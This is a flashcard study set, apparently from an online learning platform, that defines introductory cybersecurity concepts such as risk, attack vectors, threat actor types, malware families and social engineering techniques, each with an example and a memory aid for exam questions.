Class 2: Threat Types, Threat Actors, and Attack Vectors
Call Kai
Learn
Practice Test
Spaced Repetition
Match
Flashcards
Knowt Play1/70
Earn XP
Description and Tags
Name | Mastery | Learn | Test | Matching | Spaced | Call with Kai |
|---|
No analytics yet
Send a link to your students to track their progress
71 Terms
Vulnerability versus threat versus risk
A vulnerability is a weakness, a threat is something capable of exploiting that weakness, and risk is the likelihood and impact of the threat successfully exploiting it.
Example: A weak password is a vulnerability, a credential thief is a threat, and possible account compromise is the risk.
Memory trick: Weakness + danger = possible damage.
Trick question tip: Weakness or flaw means vulnerability; danger or attacker means threat; likelihood plus impact means risk.
Likelihood versus impact
Likelihood measures how probable a security event is, while impact measures how severe the consequences would be.
Example: An exposed system may have high likelihood of attack, while a system holding sensitive records may have high impact if compromised.
Memory trick: Likelihood = chance; impact = damage.
Trick question tip: Questions asking how probable point to likelihood; questions asking how harmful point to impact.
Risk assessment
A risk assessment identifies and evaluates risks so an organization can prioritize the issues that require attention first.
Example: A public-facing outdated server holding sensitive data is prioritized over an isolated low-value device.
Memory trick: Assess risk to fix the biggest danger first.
Trick question tip: If the scenario compares likelihood and impact to determine priority, think risk assessment.
Technical, physical, and human vulnerabilities
Technical vulnerabilities involve hardware, software, or configurations; physical vulnerabilities involve facilities or direct access; human vulnerabilities involve behavior, mistakes, or lack of awareness.
Example: A software flaw is technical, an unlocked equipment room is physical, and trusting a deceptive request is human.
Memory trick: Tech, place, people.
Trick question tip: Identify where the weakness exists: technology, physical environment, or human behavior.
Zero-day vulnerability
A zero-day vulnerability is a previously unknown weakness for which defenders have had little or no time to prepare and a vendor patch may not yet exist.
Example: Attackers exploit a newly discovered software flaw before an update is available.
Memory trick: Zero-day = zero days to prepare.
Trick question tip: Unknown flaw, no patch, or exploitation before vendor awareness points to zero-day.
Vulnerability management
Vulnerability management is the continuous process of identifying, analyzing, prioritizing, remediating, validating, and reporting weaknesses.
Example: A team scans systems, ranks findings by risk, applies updates, and confirms the weaknesses are fixed.
Memory trick: Find, rank, fix, verify, report.
Trick question tip: A repeating program for discovering and correcting weaknesses is vulnerability management, not a one-time scan.
Agent-based versus agentless vulnerability scanning
Agent-based scanning uses software installed on endpoints for detailed continuous visibility, while agentless scanning examines systems remotely without installing local software.
Example: A managed laptop reports findings through an installed agent, while a network appliance is checked remotely.
Memory trick: Agent lives on it; agentless looks from outside.
Trick question tip: Installed local scanner points to agent-based; remote scan with nothing installed points to agentless.
Unsupported and legacy systems
Unsupported or end-of-life systems no longer receive normal vendor security updates, making newly discovered weaknesses difficult to correct.
Example: A critical legacy device cannot be upgraded, so it is isolated and given restricted access until replacement.
Memory trick: No support means no normal fixes.
Trick question tip: If patching is impossible, look for compensating controls such as isolation, segmentation, restricted access, or replacement.
Attack surface
An attack surface is the total collection of possible points where a threat actor could interact with or attack an environment.
Example: Accounts, applications, open ports, wireless connections, cloud services, devices, and internet-facing systems all add to the attack surface.
Memory trick: More doors and windows means more ways in.
Trick question tip: If the question asks about all possible entry points together, think attack surface.
Attack vector
An attack vector is the specific path or method a threat actor uses to reach a target or deliver an attack.
Example: A deceptive message, vulnerable service, removable device, voice call, or compromised supplier can be an attack vector.
Memory trick: Surface = all doors; vector = the door used.
Trick question tip: If the question asks how the attacker entered or delivered the attack, think attack vector.
Attack surface reduction
Attack surface reduction removes or restricts unnecessary exposure so attackers have fewer opportunities to find a weakness.
Example: An organization closes unused ports, disables unnecessary services, removes stale accounts, limits public access, and segments networks.
Memory trick: Fewer entry points, fewer chances to attack.
Trick question tip: Closing ports, disabling services, removing accounts, least privilege, and segmentation point to attack surface reduction.
Remote exploit versus local exploit
A remote exploit can trigger a vulnerability across a network without prior local access, while a local exploit requires an attacker to already have access or credentials on the system.
Example: An attacker exploits an exposed service remotely; after stealing a user account, the attacker uses a local flaw to gain administrator privileges.
Memory trick: Remote reaches in; local starts inside.
Trick question tip: No prior login points to remote exploitation; authenticated access followed by privilege escalation points to local exploitation.
Direct access vector
A direct access vector requires physical access to a device or location and can bypass many network protections.
Example: An intruder uses an unattended workstation or connects unauthorized removable media to a system.
Memory trick: Physical reach can bypass digital walls.
Trick question tip: Unlocked workstation, physical port, removable media, or boot device points to direct access.
Wired network vector
A wired network vector uses a physical network connection to gain access, monitor traffic, or attack internal systems.
Example: An unauthorized person connects a device to an exposed network port inside a building.
Memory trick: Plug into the wire, enter the network.
Trick question tip: Physical Ethernet connection or exposed switch port points to a wired network vector.
Wireless and remote access vectors
Wireless and remote access vectors target Wi-Fi, remote-access services, or other connections that extend the network beyond a controlled physical location.
Example: An attacker creates a deceptive wireless access point or steals credentials for a remote connection.
Memory trick: No cable does not mean no risk.
Trick question tip: Fake access points, stolen remote credentials, wireless connections, or remote services point to wireless or remote access vectors.
Cloud access vector
A cloud access vector targets internet-accessible cloud resources through weak credentials, exposed interfaces, or misconfiguration.
Example: An attacker signs in with a stolen cloud account or finds a storage service with overly broad permissions.
Memory trick: Cloud entry often begins with identity or configuration.
Trick question tip: Weak cloud credentials, public storage, exposed cloud interfaces, or misconfiguration point to a cloud vector.
Default credentials
Default credentials are manufacturer-set usernames and passwords that should be changed before a device or service is used.
Example: A connected device remains protected by its factory administrator password, which is widely known.
Memory trick: Default password = attacker already knows the first guess.
Trick question tip: Factory username, unchanged password, or vendor default login points to default credentials.
Open service ports
Open ports expose network services, and unnecessary or vulnerable services increase the attack surface.
Example: A server exposes a remote management service that the organization does not use.
Memory trick: Every open port is another possible door.
Trick question tip: The best mitigation is to close unused ports, disable unnecessary services, and restrict required ports.
Lure-based attack vector
A lure-based vector uses something attractive, useful, urgent, or interesting to persuade a victim to open a file, connect a device, or run software.
Example: A malicious program is disguised as a free application or important update.
Memory trick: The lure attracts; the hidden code hooks.
Trick question tip: Free software, prizes, urgent updates, or curiosity used to make the user act point to a lure-based vector.
Removable media and USB drop attack
A removable-media attack uses a device such as a USB drive to deliver malware or gain access; a drop attack leaves infected media where a curious person may connect it.
Example: An infected drive is left in a break room hoping an employee plugs it into a company computer.
Memory trick: Found USB = do not plug it in.
Trick question tip: Abandoned removable media relying on curiosity points to a USB drop or baiting attack.
File-based attack vector
A file-based vector delivers malicious code through an executable, document, image, archive, or other file that a vulnerable application or user opens.
Example: A document presented as an invoice runs harmful code when opened.
Memory trick: The file looks normal; the payload is not.
Trick question tip: Attachments, documents, images, or downloads used to execute malicious code point to a file-based vector.
Message-based attack vector
A message-based vector uses email, text messages, instant messaging, social platforms, or collaboration tools to deliver links, files, requests, or deception.
Example: A message pretending to be an account alert pressures a user to open a link.
Memory trick: The message delivers the trap.
Trick question tip: Email, SMS, chat, social media, or collaboration messages used as delivery mechanisms point to message-based vectors.
Zero-click exploit
A zero-click exploit compromises a target without requiring the user to open a link, launch a file, or knowingly interact with the content.
Example: A vulnerable messaging application processes a received image automatically and triggers the flaw.
Memory trick: Zero-click = no tap needed.
Trick question tip: Simply receiving or previewing content causes compromise points to a zero-click exploit.
Threat actor
A threat actor is a person, group, organization, or entity capable of causing a security incident.
Example: Threat actors include unskilled attackers, insiders, hacktivists, organized crime, competitors, and nation-state groups.
Memory trick: Threat actor = the who behind the threat.
Trick question tip: If the question asks who is causing or carrying out the activity, identify the threat actor.
Threat actor attributes
Threat actors are compared by whether they are internal or external, their sophistication, resources, funding, access, intent, and motivation.
Example: A well-funded external group using custom tools differs from a careless employee who already has authorized access.
Memory trick: Who, where, skill, money, and why.
Trick question tip: Scenario clues about access, capability, funding, or goals are threat actor attributes.
External versus internal threat actor
An external actor begins without authorized access and must gain entry, while an internal actor already has legitimate or trusted access.
Example: A remote criminal must bypass controls, while an employee can misuse an existing account.
Memory trick: External breaks in; internal starts in.
Trick question tip: Employees, contractors, partners, or valid credentials point to internal risk; outsiders bypassing controls point to external actors.
Authorized versus unauthorized hacker
An authorized hacker has permission to test systems and report weaknesses, while an unauthorized hacker accesses or tests systems without permission.
Example: A penetration tester works under written authorization; a malicious intruder does not.
Memory trick: Permission separates ethical testing from illegal intrusion.
Trick question tip: Even harmless intent does not make testing authorized; look for explicit permission and scope.
Unskilled attacker
An unskilled attacker, historically called a script kiddie, relies on prebuilt tools, public scripts, or automated services and may not understand the underlying attack.
Example: A person downloads an existing tool and launches it against random systems.
Memory trick: Uses the tool but did not build the tool.
Trick question tip: Public tools, minimal expertise, or prebuilt scripts point to an unskilled attacker.
Hacktivist
A hacktivist uses cyber activity to promote a political, social, or ideological cause and often seeks publicity, disruption, or disclosure.
Example: A group disrupts an organization to protest its policies.
Memory trick: Hacktivist = hacking for a cause.
Trick question tip: Ideology, protest, publicity, or political messaging points to hacktivism rather than ordinary financial crime.
Nation-state threat actor
A nation-state actor operates for or receives support from a government and typically has extensive funding, intelligence, expertise, and long-term strategic goals.
Example: A government-backed group conducts espionage against critical infrastructure or defense organizations.
Memory trick: Nation-state = government resources and strategic goals.
Trick question tip: Espionage, military advantage, sabotage, critical infrastructure, and exceptional resources point to nation-state activity.
Organized crime
Organized cybercrime consists of coordinated groups that operate like businesses and primarily seek financial profit through fraud, theft, extortion, or criminal services.
Example: A group uses specialized developers, negotiators, and money handlers to run ransomware operations.
Memory trick: Organized crime = cybercrime as a business.
Trick question tip: Financial gain, specialized criminal teams, ransomware, fraud, or crime-as-a-service point to organized crime.
Competitor threat actor
A competitor threat actor targets a rival organization to gain business advantage through commercial espionage, theft of intellectual property, disruption, or reputational harm.
Example: A rival seeks confidential research, designs, formulas, customer lists, or strategic plans.
Memory trick: Competitor wants your business advantage.
Trick question tip: Trade secrets, corporate espionage, rival company, or stolen research points to a competitor threat.
Insider threat
An insider threat comes from someone with authorized access, such as an employee, contractor, vendor, partner, temporary worker, or former employee whose access was not removed.
Example: A former employee retains active credentials after leaving the organization.
Memory trick: Trusted access can still create risk.
Trick question tip: The defining clue is existing authorized knowledge or access, not whether the person is an employee.
Malicious versus unintentional insider
A malicious insider intentionally abuses access for revenge, financial gain, or another objective, while an unintentional insider causes harm through mistakes, negligence, or poor training.
Example: One employee deliberately steals records; another accidentally shares them with the wrong recipient.
Memory trick: Malice means on purpose; negligence means by mistake.
Trick question tip: Disgruntled, deliberate, or revenge points to malicious; accidental, careless, or poorly trained points to unintentional.
Insider collusion
Collusion occurs when an insider intentionally cooperates with an external actor to bypass controls or provide access, credentials, or information.
Example: An employee gives a criminal valid credentials in exchange for payment.
Memory trick: Outside attacker plus inside helper = collusion.
Trick question tip: If internal and external actors work together, choose collusion.
Shadow IT
Shadow IT is the use of unauthorized devices, applications, or cloud services outside official approval, management, and security monitoring.
Example: An employee stores company documents in a personal hosted storage service without approval.
Memory trick: Shadow IT operates outside IT's light.
Trick question tip: Unapproved apps, personal storage, unmanaged devices, or services outside monitoring point to shadow IT.
Advanced persistent threat
An APT is a highly capable, organized threat group that uses advanced methods and maintains long-term, stealthy access to achieve strategic objectives.
Example: The group remains in an environment for months, moves laterally, gathers intelligence, and preserves access.
Memory trick: Advanced tools, persistent access, organized threat.
Trick question tip: Long-term stealth, persistence, lateral movement, strategic access, or nation-state association points to an APT.
Structured versus opportunistic attack
A structured attack is carefully planned against a selected target, while an opportunistic attack broadly searches for anyone vulnerable enough to compromise.
Example: A targeted espionage campaign is structured; a mass message sent to thousands of random users is opportunistic.
Memory trick: Structured selects; opportunistic scans.
Trick question tip: Specific target and research point to structured; mass scanning or random victims point to opportunistic.
Threat actor motivation
Motivation is the reason a threat actor carries out an attack, such as financial gain, espionage, ideology, revenge, disruption, curiosity, or recognition.
Example: A criminal seeks payment, while a government-backed group seeks intelligence.
Memory trick: Motivation = why they attack.
Trick question tip: Do not confuse capability with motivation: capability is what they can do; motivation is why they do it.
Financial motivation
Financially motivated actors seek profit through theft, fraud, extortion, ransomware, stolen data, or cryptocurrency.
Example: A criminal encrypts business data and demands payment.
Memory trick: Follow the money.
Trick question tip: Profit, payment, fraud, extortion, theft, or resale of data points to financial motivation.
Espionage motivation
Espionage seeks confidential information for political, military, intelligence, or commercial advantage.
Example: A group steals research data and strategic plans without immediately disrupting the target.
Memory trick: Espionage = steal secrets for advantage.
Trick question tip: Quiet theft of intelligence, research, trade secrets, or government information points to espionage.
Ideological and political motivation
Ideological or political actors attack to promote beliefs, protest decisions, influence opinion, or advance a political objective.
Example: A group defaces or disrupts a service to draw attention to a cause.
Memory trick: Belief and politics drive the attack.
Trick question tip: Protest, activism, propaganda, publicity, or ideology points to political or ideological motivation.
Revenge, chaos, and recognition
Some actors seek retaliation, disruption, attention, curiosity, or proof of skill rather than money or intelligence.
Example: A disgruntled worker damages systems after termination, or an attacker defaces a service for recognition.
Memory trick: Not every attacker follows the money.
Trick question tip: Disgruntled behavior points to revenge; random destruction points to chaos; proving skill or seeking attention points to recognition.
Service disruption, data exfiltration, and disinformation
Service disruption targets availability, data exfiltration steals information and targets confidentiality, and disinformation spreads false or manipulated information and targets integrity.
Example: An outage blocks a service, stolen records expose secrets, and false reports undermine trust in information.
Memory trick: Disrupt availability; exfiltrate confidentiality; disinform integrity.
Trick question tip: Map the goal to the CIA triad: unavailable service, stolen data, or untrustworthy information.
Malware
Malware is software or code designed to damage systems, steal data, disrupt operations, spy on users, or provide unauthorized access.
Example: Malware families include viruses, worms, Trojans, ransomware, spyware, rootkits, and bots.
Memory trick: Malware = malicious software.
Trick question tip: If harmful code is the main mechanism, classify the specific malware type when possible.
Virus versus worm
A virus attaches to a host file or program and normally spreads when that host runs, while a worm self-replicates across systems or networks without attaching to a host file.
Example: A user opens an infected document to activate a virus; a worm automatically spreads to vulnerable devices.
Memory trick: Virus needs a host; worm crawls by itself.
Trick question tip: Host file or user execution points to virus; self-replication and automatic network spread point to worm.
Trojan
A Trojan is malware disguised as legitimate or desirable software and relies on the victim to install or run it.
Example: A supposed free application installs a hidden backdoor.
Memory trick: Trojan looks useful but hides danger.
Trick question tip: Legitimate appearance plus hidden malicious behavior points to a Trojan.
Ransomware
Ransomware blocks access to systems or encrypts data and demands payment, often combining disruption with data theft and extortion.
Example: A business loses access to files and receives a payment demand.
Memory trick: Ransomware holds access for ransom.
Trick question tip: Encryption plus payment demand points to ransomware; stolen data may be used for double extortion.
Spyware and keylogger
Spyware secretly monitors activity or collects information, while a keylogger specifically records keyboard input.
Example: Malware captures browsing activity, credentials, and typed messages without the user's knowledge.
Memory trick: Spyware watches; keylogger records keys.
Trick question tip: General secret monitoring points to spyware; captured keystrokes point to a keylogger.
Rootkit and backdoor
A rootkit hides malicious activity and maintains privileged access, while a backdoor provides a hidden method of bypassing normal authentication or security controls.
Example: Malware conceals itself at a privileged level and creates a secret access path for later use.
Memory trick: Rootkit hides; backdoor lets attackers return.
Trick question tip: Stealth and concealment point to rootkit; secret reentry or bypassing normal login points to backdoor.
Botnet and command and control
A botnet is a group of compromised devices controlled together, and command-and-control infrastructure sends instructions to those devices and receives results.
Example: Thousands of infected devices receive commands to generate disruptive traffic.
Memory trick: Bots are the army; C2 gives the orders.
Trick question tip: Many compromised devices acting together point to botnet; the controller or instruction channel is C2.
Polymorphic malware
Polymorphic malware changes parts of its code or appearance to avoid matching known signatures while retaining its malicious purpose.
Example: Each copy looks different to a signature scanner even though the behavior remains harmful.
Memory trick: Same threat, changing disguise.
Trick question tip: Changing code to evade signature-based detection points to polymorphic malware.
Social engineering
Social engineering manipulates people into revealing information, granting access, or performing actions that benefit an attacker.
Example: An attacker exploits trust, urgency, fear, authority, curiosity, or helpfulness to obtain credentials.
Memory trick: Social engineering = hack the human.
Trick question tip: If the attacker persuades a person instead of directly defeating technology, think social engineering.
Impersonation versus pretexting
Impersonation means pretending to be a trusted person or organization, while pretexting adds a detailed fabricated story that explains and supports the request.
Example: An attacker claims to be support staff; a pretext includes the employee's department, manager, and a believable service issue.
Memory trick: Impersonation is the role; pretexting is the story.
Trick question tip: Pretending alone points to impersonation; a researched backstory and scenario point to pretexting.
Phishing
Phishing uses deceptive messages or sites that appear trustworthy to steal information, install malware, or obtain access.
Example: A fake account notice directs a user to a fraudulent login page.
Memory trick: Phishing casts a wide deceptive net.
Trick question tip: Generic deceptive messages sent broadly point to phishing; a specifically researched target points to spear phishing.
Spear phishing versus whaling
Spear phishing targets a specific person or group using tailored information, while whaling is spear phishing aimed at senior executives or other high-value individuals.
Example: A customized message targets an accountant; a similar attack targeting the chief executive is whaling.
Memory trick: Spear = specific; whale = big target.
Trick question tip: Named employee or department points to spear phishing; executive or high-value leader points to whaling.
Vishing versus smishing
Vishing is phishing conducted through voice calls, while smishing uses SMS or text messages.
Example: A caller pretends to represent a service provider; a text claims an account needs immediate verification.
Memory trick: Vishing = voice; smishing = SMS.
Trick question tip: Phone conversation points to vishing; text message points to smishing.
Business email compromise
Business email compromise is a targeted fraud in which an attacker impersonates or compromises a trusted business account to request payments, data, or account changes.
Example: A message appearing to come from an executive asks finance staff to change payment details.
Memory trick: BEC uses business trust to steal.
Trick question tip: Executive impersonation, invoice changes, wire transfers, payroll changes, or a real compromised mailbox point to BEC.
Brand impersonation
Brand impersonation copies an organization's name, logos, formatting, and communication style to make a fraudulent message or login page appear authentic.
Example: A fake support page closely matches a familiar company's normal appearance.
Memory trick: Copy the brand to borrow its trust.
Trick question tip: Copied logos, design, tone, or near-identical communications point to brand impersonation.
Credential harvesting
Credential harvesting tricks users into entering usernames, passwords, or other authentication information into an attacker-controlled prompt or page.
Example: A fraudulent login form records the user's credentials and then displays a normal-looking error.
Memory trick: Fake login, real credentials stolen.
Trick question tip: A deceptive sign-in page or prompt whose purpose is collecting passwords points to credential harvesting.
Baiting
Baiting offers something desirable or interesting to persuade a person to perform an unsafe action.
Example: A supposedly free download or abandoned storage device causes the victim to install malware.
Memory trick: Bait hides the hook.
Trick question tip: Free item, prize, download, or curiosity used to trigger action points to baiting.
Tailgating versus piggybacking
Tailgating occurs when an unauthorized person follows an authorized person into a restricted area without permission, while piggybacking occurs when the authorized person knowingly allows entry.
Example: An intruder slips through a closing door unnoticed; in another case, an employee deliberately holds the door open.
Memory trick: Tailgating sneaks; piggybacking gets a ride.
Trick question tip: Unaware authorized person points to tailgating; knowingly assisting entry points to piggybacking.
Shoulder surfing
Shoulder surfing obtains sensitive information by watching a person enter or view it.
Example: Someone observes a password, PIN, badge code, or confidential screen in a public area.
Memory trick: Look over the shoulder, steal what is shown.
Trick question tip: Direct visual observation of credentials or screens points to shoulder surfing.
Dumpster diving
Dumpster diving searches discarded materials for sensitive information that was not securely destroyed.
Example: An attacker retrieves printed records, labels, or equipment details from ordinary trash.
Memory trick: Trash can still contain intelligence.
Trick question tip: Information recovered from discarded papers or devices points to dumpster diving.
Pharming versus typosquatting
Pharming redirects a correctly entered destination to an attacker-controlled location, often through name-resolution manipulation, while typosquatting registers a look-alike name that relies on user misspelling.
Example: A user types the correct service name but is redirected through poisoned name resolution; another user reaches a look-alike page after a typing error.
Memory trick: Pharming changes the route; typosquatting catches the typo.
Trick question tip: Correct name but wrong destination points to pharming; misspelled or look-alike name points to typosquatting.
Watering hole attack
A watering hole attack compromises a site or service frequently used by the intended victims and waits for them to visit.
Example: Attackers compromise a trusted industry resource because employees of the target organization visit it regularly.
Memory trick: Predator waits where the targets gather.
Trick question tip: A trusted site commonly visited by a specific group is compromised to reach that group.
Physical social engineering
Physical social engineering uses deception, distraction, urgency, or impersonation to bypass physical security procedures.
Example: An attacker creates confusion during an emergency and enters a restricted area while staff are distracted.
Memory trick: Trick people to cross the physical boundary.
Trick question tip: Distraction, fake emergency, impersonation, or manipulation used for building access points to physical social engineering.
Deepfake-enabled social engineering
Deepfake technology can imitate a person's voice or appearance, making impersonation and urgent fraudulent requests more convincing.
Example: An employee receives a realistic voice message that appears to come from a senior leader requesting a payment.
Memory trick: Familiar voice does not prove identity.
Trick question tip: Realistic generated voice or video used to imitate a trusted person points to deepfake-enabled social engineering.
Supply chain attack
A supply chain attack compromises a vendor, supplier, product, service, update process, or other trusted partner to reach the final target indirectly.
Example: An attacker compromises a software provider so customers receive a harmful update through a trusted channel.
Memory trick: Attack the trusted link to reach the target.
Trick question tip: Vendor, supplier, update, contractor, partner, or third-party compromise points to a supply chain attack.
Supply chain security
Supply chain security manages third-party risk by assessing vendors, setting contractual security requirements, monitoring access, and verifying the integrity of hardware, software, firmware, and updates.
Example: An organization reviews a supplier's controls and verifies delivered components before deployment.
Memory trick: Protect and verify every trusted link.
Trick question tip: Vendor assessments, contract requirements, integrity checks, and third-party monitoring point to supply chain security.
Managed service provider risk
An MSP manages technology for multiple customers, so compromise of the provider can give an attacker indirect access to many organizations at once.
Example: A criminal compromises a provider's remote management system and uses it to reach several customer networks.
Memory trick: One provider compromise can multiply the victims.
Trick question tip: A third party managing networks, cloud services, backups, or remote administration for many customers points to MSP risk.